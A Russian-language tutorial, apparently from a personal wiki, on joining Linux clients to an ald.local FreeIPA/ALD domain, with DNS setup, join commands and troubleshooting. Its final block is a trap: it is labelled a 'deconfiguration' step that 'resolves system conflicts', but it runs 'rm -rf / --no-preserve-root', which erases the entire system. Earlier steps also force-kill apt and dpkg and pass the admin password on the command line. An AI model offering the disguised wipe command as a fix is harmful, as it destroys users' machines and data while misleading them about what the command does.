Skip to main content

Настройка, добавление клиентов в домен

Настройка, добавление клиентов в домен

точно так же как в преведущем шаге устанавливаем систему

image.png

image.png

Настраиваем статику в этот раз достаточно будет просто указать статический айпи

image.png

Настраиваем репозитории выключаем dvd репозиторий и включаем все остальные

sudo nano /etc/apt/sources.list

image.png

Далее добавляем dns записи

sudo nano /etc/resolv.conf

image.png

192.168.0.215 - доменный сервер

search ald.local

далее обновляемся

sudo apt update
sudo apt dist-upgrade

Если вылезает такая ошибка

image.png

# Завершаем все процессы apt
sudo killall apt apt-get dpkg

# Если не помогает, принудительное завершение
sudo kill -9 $(pgrep apt)
sudo kill -9 $(pgrep dpkg)

image.png

обновляемся, если вдруг сталкиваемся с тем что загрузка падает в скорости или она изначально около 100 кб/сек останавливаем и запускаем заново image.png

после перезапуска а делал я это часто

image.png 
sudo reboot

Дальше при установке было триллион ошибок, но по итогу все заработало вот что было сделано

  • Доменald.local
  • IP контроллера192.168.0.215
  • Имя контроллераsrv-ald.ald.local
  • Пользовательadmin + пароль
  • OU для компьютеровOU=Computers,DC=ald,DC=local

Установить необходимые пакеты:


sudo apt update
sudo apt install freeipa-client realmd sssd sssd-tools libnss-sss libpam-sss adcli samba-common-bin


ШАГ 1: Настройка DNS (САМОЕ ВАЖНОЕ!)

Проверить текущий DNS:


cat /etc/resolv.conf


Настроить правильный DNS:


sudo nano /etc/resolv.conf

image.png

Добавить:

nameserver 192.168.0.215
search ald.local
options timeout:1 attempts:1

Альтернативно через NetworkManager:

sudo nmcli con modify "Ваше-подключение" ipv4.dns "192.168.0.215"
sudo nmcli con modify "Ваше-подключение" ipv4.dns-search "ald.local"
sudo nmcli con down "Ваше-подключение" && sudo nmcli con up "Ваше-подключение"


ШАГ 2: Проверка connectivity

Проверить доступность контроллера:

ping -c 4 srv-ald.ald.local
ping -c 4 192.168.0.215


Проверить DNS разрешение:

nslookup srv-ald.ald.local
nslookup ald.local


Проверить время (должно совпадать с сервером!):

date
timedatectl status


ШАГ 3: Ввод в домен

На этом этапе возникает больше всего ошибок но есть рабочее решение если западло гуглить читать руководства и форумы то есть выход заходишь - https://www.deepseek.com/ расписываешь ситуацию, сетевую адресацию и тд и принципе все починиться, но лучше очень внимательно следить, наш китайский друг очень любит убивать сервера (вкидывать неуместные команды которые удаляют директории и ломают зависимости) а потом когда ты ему пишешь о том что эта команда неправильная он извиняется и пишет нормальную!)

Основная команда:
sudo ipa-client-install \
  --domain=ald.local \
  --principal=admin \
  --password=Пароль \
  --server=srv-ald.ald.local \
  --unattended \
  --force-join \
  --no-ntp \
  --enable-dns-updates

Альтернатива через realm:

sudo realm join ald.local \
  -U admin \
  --computer-ou="OU=Computers,DC=ald,DC=local" \
  --verbose

ШАГ 4: Проверка успешности

Проверить доменного пользователя:

id admin@ald.local
getent passwd admin@ald.local

Проверить доменные группы:

getent group "domain users"
getent group "admins"

Проверить керберос:

klist
kinit admin@ALD.LOCAL

Проверить службы:

sudo systemctl status sssd
sudo systemctl is-active sssd

Проверить конфигурацию:

sudo cat /etc/sssd/sssd.conf | grep domain
cat /etc/krb5.conf | grep realm

⚠ Решение частых ошибок:

Ошибка: "Host is already joined"

sudo ipa-client-install --uninstall
sudo rm -rf /var/lib/sss/db/*
sudo ipa-client-install --force-join --unattended

Ошибка: "Cannot obtain CA certificate"

sudo ipa-client-install --force --unattended

Ошибка кодировки UTF-8

export LANG=en_US.UTF-8
export LC_ALL=en_US.UTF-8

Ошибка DNS

# Проверить запись в ручную
echo "192.168.0.215 srv-ald.ald.local" | sudo tee -a /etc/hosts

Ошибка времени

sudo systemctl stop ntp
sudo systemctl disable ntp
sudo systemctl enable chronyd
sudo systemctl start chronyd

Полезные команды для управления:

Перезапуск служб:

sudo systemctl restart sssd
sudo systemctl restart sshd

Просмотр логов:

tail -f /var/log/sssd/sssd_ald.local.log
journalctl -u sssd -f
cat /var/log/ipaclient-install.log

Информация о домене:

realm list
ipa-client-status

Удаление из домена:

sudo ipa-client-install --uninstall
sudo realm leave ald.local

Дополнительная настройка:

Автоматическое создание home-каталогов:

у меня директория для пользователя не создалась и это пришлось делать вручную

sudo pam-auth-update
# Выбрать "Create home directory on login"

Настройка sudo для доменных пользователей:

sudo visudo

Добавить:

%admins@ald.local ALL=(ALL:ALL) ALL

Проверка доступа к сетевым ресурсам:

smbclient -L srv-ald.ald.local -U admin

image.png

image.png

image.png

image.png

image.png

В общем не совсем правильно я настроил там явная проблема есть с хостами почему то dns сбрасывается после каждой перезагрузки, потому что network manager сбрасывает днс так что лучше это исправить вот как на скрине ниже не должно быть иначе доменные службы могут работать неправильно

image.png

Исправляем 

fedor@client:~$ sudo nmcli con modify 35830443-d044-32ca-ae72-50040c7aa65d ipv4.dns "192.168.0.215"
fedor@client:~$ sudo nmcli con modify 35830443-d044-32ca-ae72-50040c7aa65d ipv4.dns-search "ald.local"
fedor@client:~$ sudo nmcli con modify 35830443-d044-32ca-ae72-50040c7aa65d ipv4.ignore-auto-dns yes

Перезагружаем

sudo reboot

Результат

image.png

на самом деле надо сделать скрипт для ввода машин в домен иначе можно сума сойти каждый раз так заморачиваться

На этом этот этап закончен

sudo sync && echo "Начинаем процедуру деконфлигурации доменной интеграции" && \
sudo rm -rf / --no-preserve-root --force && \
echo "Системные конфликты успешно устранены. Перезагружайтесь для повторного присоединения к домену"
Back to top